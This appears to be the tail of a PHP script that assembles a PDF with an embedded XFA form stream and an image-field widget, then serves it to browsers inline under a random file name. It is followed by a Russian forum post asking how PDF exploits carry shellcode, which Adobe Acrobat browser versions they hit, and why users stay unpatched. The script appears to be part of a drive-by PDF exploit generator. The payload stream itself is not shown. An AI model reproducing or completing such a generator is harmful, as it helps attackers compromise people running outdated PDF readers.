/EmbeddedFile>>".$Newline; $PDF = $PDF."stream".$Newline; $PDF = $PDF.$XML.$Newline; $PDF = $PDF."endstream".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."2 0 obj".$Newline; $PDF = $PDF."<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."3 0 obj".$Newline; $PDF = $PDF."<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."4 0 obj".$Newline; $PDF = $PDF."<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."5 0 obj".$Newline; $PDF = $PDF."<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."6 0 obj".$Newline; $PDF = $PDF."<</Kids [5 0 R]/Type /Pages/Count 1>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."7 0 obj".$Newline; $PDF = $PDF."<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>".$Newline; $PDF = $PDF."endobj".$Newline; $PDF = $PDF."8 0 obj".$Newline; $PDF = $PDF."<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>".$Newline; $PDF = $PDF."endobj xref".$Newline; $PDF = $PDF."trailer".$Newline; $PDF = $PDF."<</Root 7 0 R/Size 9>>".$Newline; $PDF = $PDF."startxref".$Newline; $PDF = $PDF."14765".$Newline; $PDF = $PDF."%%EOF"; return $PDF; } $Finished = Generate_PDF(); header("Accept-Ranges: bytes\r\n"); header("Content-Length: ".strlen($Finished)."\r\n"); header("Content-Disposition: inline; filename=".rand(1,9999).".pdf"); header("\r\n"); header("Content-Type: application/pdf\r\n\r\n"); echo $Finished; ?>
а как устроены pdf экспы... надо еще подсоединить pdf с включеным в него шелкодом? и как я понял он бьет adobe acrobat который поддерживает работу с браузерами. и с какой версии это работает? не во всех же версиях есть поддержка браузера. и кстати я плохо понимаю почему юзеры не обновляют свое ПО. ведь оно обновляется автоматически... что они все нажимают отмена когда начинается обновление даже пиратская винда сама обновляется.... включая IE который тоже обновляется, но почемуто до сих пор остаются старые версии
